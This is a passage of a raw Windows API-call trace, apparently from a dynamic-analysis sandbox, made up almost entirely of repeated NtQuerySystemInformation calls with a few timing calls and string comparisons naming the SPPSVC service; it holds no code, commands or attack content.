SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0209.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0209.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0209.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0209.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x20, ResultLength=0x0) [0209.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0209.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0209.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0209.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0209.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x20, ResultLength=0x0) [0209.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x20, ResultLength=0x0) [0209.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x20, ResultLength=0x0) [0209.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb88, Length=0x50, ResultLength=0x0) [0209.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x28, ResultLength=0x0) [0209.874] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0209.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb88, Length=0x50, ResultLength=0x0) [0209.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb88, Length=0x50, ResultLength=0x0) [0209.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x50, ResultLength=0x0) [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x28, ResultLength=0x0) [0209.875] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x50, ResultLength=0x0) [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x50, ResultLength=0x0) [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x50, ResultLength=0x0) [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x38, ResultLength=0x0) [0209.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x28, ResultLength=0x0) [0209.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x28, ResultLength=0x0) [0209.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x28, ResultLength=0x0) [0209.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x28, ResultLength=0x0) [0209.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x38, ResultLength=0x0) [0209.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x28, ResultLength=0x0) [0209.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x28, ResultLength=0x0) [0209.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x38, ResultLength=0x0) [0209.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x20, ResultLength=0x0) [0209.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0209.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0209.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x38, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x20, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0209.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a67fdad0 | out: lpSystemTimeAsFileTime=0xf7a67fdad0*(dwLowDateTime=0xf78ca2f, dwHighDateTime=0x1d63874)) [0209.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb88, Length=0x50, ResultLength=0x0) [0209.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x28, ResultLength=0x0) [0209.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d8, Length=0x50, ResultLength=0x0) [0209.892] GetTickCount () returned 0x1174fe8 [0209.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a8, Length=0x58, ResultLength=0x0) [0209.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0209.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0209.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0209.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0209.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd660, Length=0x28, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0209.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0209.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0209.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0209.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0209.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0209.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a8, Length=0x58, ResultLength=0x0) [0209.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0209.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0209.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0209.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0209.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0209.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0209.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0209.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0209.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0209.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0209.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0209.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0209.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x20, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0210.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.219] NtQuerySystemInformation (SystemInformationClass=0xb9, 